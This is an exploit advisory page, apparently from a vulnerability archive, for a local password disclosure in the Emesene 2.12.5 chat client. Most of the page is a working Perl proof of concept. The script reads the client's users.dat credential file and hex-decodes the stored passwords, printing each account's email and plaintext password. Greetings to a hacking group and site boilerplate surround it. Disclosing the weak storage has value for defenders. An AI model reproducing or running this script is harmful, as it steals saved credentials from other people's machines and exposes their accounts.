Emesene 2.12.5 Password Disclosure

2012.07.03
Credit: Daniel Godoy
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

# Exploit Title: Emesene Password Disclosure # Category: Local # Date: 29/06/2012 # Author: Daniel Godoy # Author Mail: DanielGodoy[at]GobiernoFederal[dot]com # Author Web: www.delincuentedigital.com.ar # Sofware web: http://blog.emesene.org/p/downloads.html # Tested on: Linux The only requirement to run the script is that the customer is highlighted remember password. [Comment] Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego, Incid3nt, Maximiliano Soler, Pablin77,_tty0, Login-Root,Knet,Kikito,Duraznit0, InyeXion, ksha, zerial,LinuxFer, Scorp her0, r0dr1 y demas user de RemoteExecution www.remoteexecution.info www.remoteexcution.com.ar #RemoteExecution Hacking Group [PoC] #!/usr/bin/perl #/home/$HOME/.config/emesene1.0 system("clear"); print "[ EMESENE PASSWORD DISCLOSURE ]\n"; print "TESTED ON UBUNTU 10.04 LTS\n"; my $pwn="users.dat"; open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n"; $cantidad++ while <ENTRADA>; close (ENTRADA); open (ENTRADA,"<$pwn") || die "ERROR: No puedo abrir el fichero $pwn\n"; @source = <ENTRADA>; for($i = 0; $i < $cantidad; $i++) { @password= split(":", $source[$i]); print "Mail: ".$password[0]." Password PWND! => "; print pack("H*", $password[1]), "\n"; } close (ENTRADA); ------------------------- Correo enviado por medio de MailMonstruo - www.mailmonstruo.com

References:

http://blog.emesene.org/p/downloads.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top